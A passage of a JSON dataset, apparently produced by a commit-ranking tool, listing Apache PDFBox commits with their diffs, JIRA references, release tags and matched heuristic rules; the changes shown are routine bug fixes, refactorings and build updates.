stream to append new content", - "- PDStream contentsToAppend = new PDStream(document);", - "- ", - " // Add new stream to contents array", - "@@ -175,5 +178,6 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " }", - "+", - " if (appendContent.isPrepend())", - " {", - "- array.add(0, contentsToAppend.getCOSObject());", - "+ array.add(0, stream.getCOSObject());", - " }", - "@@ -181,3 +185,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- array.add(contentsToAppend);", - "+ array.add(stream);", - " }", - "@@ -187,12 +191,13 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- // create a new stream to encapsulate the existing stream", - "- PDStream saveGraphics = new PDStream(document);", - "- setOutputStream(saveGraphics.createOutputStream(filter));", - "- ", - "- // save the initial/unmodified graphics context", - "- saveGraphicsState();", - "- close();", - "- ", - "+ // create a new stream to prefix existing stream", - "+ PDStream prefixStream = new PDStream(document);", - "+", - "+ // save the pre-append graphics state", - "+ OutputStream prefixOut = prefixStream.createOutputStream();", - "+ prefixOut.write(\"q\".getBytes(Charsets.US_ASCII));", - "+ prefixOut.write('\\n');", - "+ prefixOut.close();", - "+", - " // insert the new stream at the beginning", - "- array.add(0, saveGraphics.getCOSObject());", - "+ array.add(0, prefixStream.getCOSObject());", - " }", - "@@ -201,5 +206,4 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " sourcePage.getCOSObject().setItem(COSName.CONTENTS, array);", - "- setOutputStream(contentsToAppend.createOutputStream(filter));", - "- // restore the initial/unmodified graphics context", - "+ // restore the pre-append graphics state", - " if (resetContext)", - "@@ -215,7 +219,5 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " }", - "- PDStream contents = new PDStream(document);", - "- sourcePage.setContents(contents);", - "- setOutputStream(contents.createOutputStream(filter));", - "+ sourcePage.setContents(stream);", - " }", - "- ", - "+", - " // this has to be done here, as the resources will be set to null when resetting the content", - "@@ -229,2 +231,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " setResources(resources);", - "+", - " // configure NumberFormat", - "@@ -370,3 +373,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- COSWriter.writeString(encodedText, getOutputStream());", - "+ COSWriter.writeString(encodedText, outputStream);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4068": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4068", - "relevance": 2 - } - ] - }, - { - "commit_id": "0663506b3042af7f40019f350b97b211a7d41804", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530181710, - "hunks": 1, - "message": "PDFBOX-4254: return initialException as final return path git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834593 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java b/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java", - "index fc7ff6482..f11f219f3 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java", - "@@ -152,3 +152,3 @@ public final class IOUtils", - " }", - "- return null;", - "+ return initialException;", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4254": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "627d9dc783cb3a117ab1b052eddf33129d29e1b6" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4254", - "relevance": 2 - } - ] - }, - { - "commit_id": "c24110a4e11eef8a3f1e0c7092431faab2344ae3", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523281094, - "hunks": 3, - "message": "PDFBOX-4184: divide 16 bit alpha values by 256 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828715 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 92f30feda..475437112 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -19,2 +19,3 @@ import java.awt.Transparency;", - " import java.awt.image.BufferedImage;", - "+import java.awt.image.DataBuffer;", - " import java.awt.image.WritableRaster;", - "@@ -186,5 +187,8 @@ public final class LosslessFactory", - " bpc = 8;", - "+ int dataType = alphaRaster.getDataBuffer().getDataType();", - "+ // for 16 it images we need to ", - "+ int shift = dataType == DataBuffer.TYPE_USHORT ? 8 : 0;", - " for (int pixel : pixels)", - " {", - "- bos.write(pixel);", - "+ bos.write(pixel >>> shift);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "8804e0042cbd029a22ca8fd00d73ad740f125a21" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "b38e7c56d9aa045f87eb3fe75f8900990993f231", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1533234468, - "hunks": 1, - "message": "PDFBOX-4071: update owasp plugin git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1837331 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 9541dd891..107814dfb 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -146,3 +146,3 @@", - " dependency-check-maven", - "- 3.2.1", - "+ 3.3.0", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "e4694aa08ac836171e3bc2b56e81d65863a3d2b9" - ], - [ - "no-tag", - "a492fe5f9b6bf8f7f7b327e7f5080dec5eed9f53" - ], - [ - "no-tag", - "594506cb92e03767e4941473a88fc72c617340d5" - ], - [ - "no-tag", - "fc68ed0c5974540d104f27a4aff0183e8c821b67" - ], - [ - "no-tag", - "6429c1ff0571e2c3bb4c54b314999cd0c8fa4ecf" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "b6257c465930e845684d5dc67e9ecaed15fb6f82", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527182982, - "hunks": 3, - "message": "PDFBOX-4095: Sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832191 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "index 48b397c73..db1a0ac4a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "@@ -350,5 +350,5 @@ public abstract class BlendMode", - " delta = ((rs - rd) * 77 + (gs - gd) * 151 + (bs - bd) * 28 + 0x80) >> 8;", - "- r = (rd + delta);", - "- g = (gd + delta);", - "- b = (bd + delta);", - "+ r = rd + delta;", - "+ g = gd + delta;", - "+ b = bd + delta;", - "@@ -361,3 +361,3 @@ public abstract class BlendMode", - " max = Math.max(r, Math.max(g, b));", - "- scale = (max == y ? 0 : ((255 - y) << 16) / (max - y));", - "+ scale = max == y ? 0 : ((255 - y) << 16) / (max - y);", - " }", - "@@ -367,3 +367,3 @@ public abstract class BlendMode", - " min = Math.min(r, Math.min(g, b));", - "- scale = (y == min ? 0 : (y << 16) / (y - min));", - "+ scale = y == min ? 0 : (y << 16) / (y - min);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4095": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "64a4a44e6be1b3e7fc87f5928090cd4fc61989f5" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4095", - "relevance": 2 - } - ] - }, - { - "commit_id": "bc90a1c99c5527f4bf67c86a0552c31070f924d4", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527273375, - "hunks": 6, - "message": "PDFBOX-4071: add test to protect initialization sequence; move constructor to top for Sonar; avoid COMPATIBLE returning blend mode that specification says \"shouldn't be used\" git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832264 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "index db1a0ac4a..338ff8fcf 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "@@ -62,3 +62,3 @@ public abstract class BlendMode", - " }", - "- return BlendMode.COMPATIBLE;", - "+ return BlendMode.NORMAL;", - " }", - "@@ -253,2 +253,6 @@ public abstract class BlendMode", - "+ BlendMode()", - "+ {", - "+ }", - "+", - " private static int get255Value(float val)", - "@@ -378,3 +382,3 @@ public abstract class BlendMode", - "- // these maps *must* come after the declarations above, otherwise its values will be null", - "+ // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", - " private static final Map BLEND_MODES = createBlendModeMap();", - "@@ -386,3 +390,4 @@ public abstract class BlendMode", - " map.put(COSName.NORMAL, BlendMode.NORMAL);", - "- map.put(COSName.COMPATIBLE, BlendMode.COMPATIBLE);", - "+ // BlendMode.COMPATIBLE should not be used", - "+ map.put(COSName.COMPATIBLE, BlendMode.NORMAL);", - " map.put(COSName.MULTIPLY, BlendMode.MULTIPLY);", - "@@ -409,3 +414,4 @@ public abstract class BlendMode", - " map.put(BlendMode.NORMAL, COSName.NORMAL);", - "- map.put(BlendMode.COMPATIBLE, COSName.COMPATIBLE);", - "+ // BlendMode.COMPATIBLE should not be used", - "+ map.put(BlendMode.COMPATIBLE, COSName.NORMAL);", - " map.put(BlendMode.MULTIPLY, COSName.MULTIPLY);", - "@@ -427,6 +433,2 @@ public abstract class BlendMode", - " }", - "-", - "- BlendMode()", - "- {", - "- }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "7d5534b4ba75a1c4c610f6adb637d00e780daa08" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "29492ed1d27e4b31d30fc71b6deaa84cf1813c5f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527095770, - "hunks": 3, - "message": "PDFBOX-4228: fix ClassCastException and bug that prevented the use of a name for encoding in type3 fonts, by Daniel Persson git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832111 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "index bd043e68a..752e2e19f 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "@@ -21,2 +21,4 @@ import java.io.IOException;", - " import java.io.InputStream;", - "+import org.apache.commons.logging.Log;", - "+import org.apache.commons.logging.LogFactory;", - " import org.apache.fontbox.FontBoxFont;", - "@@ -43,2 +45,7 @@ public class PDType3Font extends PDSimpleFont", - " {", - "+ /**", - "+ * Log instance.", - "+ */", - "+ private static final Log LOG = LogFactory.getLog(PDType3Font.class);", - "+", - " private PDResources resources;", - "@@ -68,4 +75,16 @@ public class PDType3Font extends PDSimpleFont", - " {", - "- COSDictionary encodingDict = (COSDictionary)dict.getDictionaryObject(COSName.ENCODING);", - "- encoding = new DictionaryEncoding(encodingDict);", - "+ COSBase encodingBase = dict.getDictionaryObject(COSName.ENCODING);", - "+ if (encodingBase instanceof COSName)", - "+ {", - "+ COSName encodingName = (COSName) encodingBase;", - "+ encoding = Encoding.getInstance(encodingName);", - "+ if (encoding == null)", - "+ {", - "+ LOG.warn(\"Unknown encoding: \" + encodingName.getName());", - "+ }", - "+ }", - "+ else if (encodingBase instanceof COSDictionary)", - "+ {", - "+ encoding = new DictionaryEncoding((COSDictionary) encodingBase);", - "+ }", - " glyphList = GlyphList.getAdobeGlyphList();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4228": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "113313a81a82377a8a07a2c55ce0ba6ce3ed20a5" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4228", - "relevance": 2 - } - ] - }, - { - "commit_id": "a8d0e0cbfcb7fffaca48e0568a3bafabb3f7f76a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530368232, - "hunks": 1, - "message": "PDFBOX-4184, PDFBOX-4071: exclude idea, as suggested by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834738 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/.gitignore b/.gitignore", - "index 748b8ba93..1bb6e9aa6 100644", - "--- a/.gitignore", - "+++ b/.gitignore", - "@@ -5 +5,2 @@ bin/", - " .project", - "+.idea/" - ], - "changed_files": [ - ".gitignore" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "", - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "28fc7175c436a1d3b3a18a26a363fa62a0e217c2" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184, PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "50d1e2e8adf131119a5bceb418d460496bf62681", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524072720, - "hunks": 2, - "message": "PDFBOX-4197: consider object references git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829462 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java", - "index 1584f42aa..abe1e8a61 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java", - "@@ -176,2 +176,6 @@ public class PDStructureElement extends PDStructureNode", - " COSBase item = it.next();", - "+ if (item instanceof COSObject)", - "+ {", - "+ item = ((COSObject) item).getObject();", - "+ }", - " if (item instanceof COSDictionary)", - "@@ -346,2 +350,6 @@ public class PDStructureElement extends PDStructureNode", - " COSBase item = it.next();", - "+ if (item instanceof COSObject)", - "+ {", - "+ item = ((COSObject) item).getObject();", - "+ }", - " if (item instanceof COSName)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4197": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "aec7d1e3b765ea9763803d9229c02ae6f082c188" - ], - [ - "no-tag", - "716ecbe82f1113cc50d76733e5b2045aeda959ef" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4197", - "relevance": 2 - } - ] - }, - { - "commit_id": "829c81b296ab9d4df8604e18ad8b9ade26fbab1b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531936045, - "hunks": 4, - "message": "PDFBOX-4013: sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836209 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", - "index 4f5af00c3..b2e4c3d22 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", - "@@ -134,8 +134,7 @@ public class OSXAdapter implements InvocationHandler", - " {", - "- if (!method.getName().equals(\"handleQuitRequestWith\"))", - "+ if (\"handleQuitRequestWith\".equals(method.getName()))", - " {", - "- return null;", - "+ // We just call our own quit handler", - "+ quitHandler.invoke(target);", - " }", - "- // We just call our own quit handler", - "- quitHandler.invoke(target);", - " return null;", - "@@ -245,2 +244,3 @@ public class OSXAdapter implements InvocationHandler", - " // file to be opened", - "+ @Override", - " public boolean callTarget(Object appleEvent) {" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4013": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "c713d75fe62eb3f25b59b9fd84779d6b19de8dab" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4013", - "relevance": 2 - } - ] - }, - { - "commit_id": "e8f631de7e74afb76848f914d14a796e276c3a17", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531583773, - "hunks": 1, - "message": "PDFBOX-4071: avoid \"unchecked\" warnings git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835916 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", - "index 57beb6b3f..464668a6d 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", - "@@ -232,2 +232,3 @@ public class CertInformationCollector", - "+ @SuppressWarnings(\"unchecked\")", - " Collection matches = certificatesStore" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "207e0f308824c676e792f10c77fbf5b26b880d63" - ], - [ - "no-tag", - "dad63a8e49babcfa3075f4050a17097d44c75830" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "ece4c5f0da288c6f82125191fcd4e023679cc71f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532326549, - "hunks": 1, - "message": "PDFBOX-4071: replace broken link with archive git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836463 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index f62a84d9e..fcbebd90d 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -136,3 +136,3 @@", - " ${skip-bavaria}", - "- http://www.pdflib.com/fileadmin/pdflib/Bavaria/2009-04-03-Bavaria-pdfa.zip", - "+ https://web.archive.org/web/20160305185745if_/http://www.pdflib.com/fileadmin/pdflib/Bavaria/2009-04-03-Bavaria-pdfa.zip", - " true" - ], - "changed_files": [ - "preflight/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "6af0a0d1b3f126e21cc80347cc2b0eb7ec1b410c" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "1e6bf35df4b91fdd0eec5c32c3f05ab92d27a4c9", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524671488, - "hunks": 1, - "message": "PDFBOX-4071: correct javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1830092 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java", - "index 7f5c40ea7..7cdbc6d53 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java", - "@@ -108,3 +108,3 @@ public class PDBorderEffectDictionary implements COSObjectable", - " *", - "- * @return the effect of the border", - "+ * @return the effect of the border or {@link #STYLE_SOLID} if none is found.", - " */" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "ca68c6ac525451e647505e062feb65aab8121d7f" - ], - [ - "no-tag", - "b830a0536914b55325fa4c1bf7801625723d1d6c" - ], - [ - "no-tag", - "31094dda08aa280adf42f05c1da2bca068391d30" - ], - [ - "no-tag", - "5a89ad7859341b2a1d89b6f290871c6035a35f2d" - ], - [ - "no-tag", - "d5bbe5637dd0ba704065d6202854ce40667fe9be" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "6156337e979401441d9f7eb4ef92b1be8d0a84e9", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531248757, - "hunks": 1, - "message": "PDFBOX-4184: fix heuristics git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835595 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index ddbef8dc5..561558f70 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -667,3 +667,4 @@ public final class LosslessFactory", - " {", - "- sum += aDataRawRowSub & 0xFF;", - "+ // https://www.w3.org/TR/PNG-Encoders.html#E.Filter-selection", - "+ sum += Math.abs(aDataRawRowSub);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - 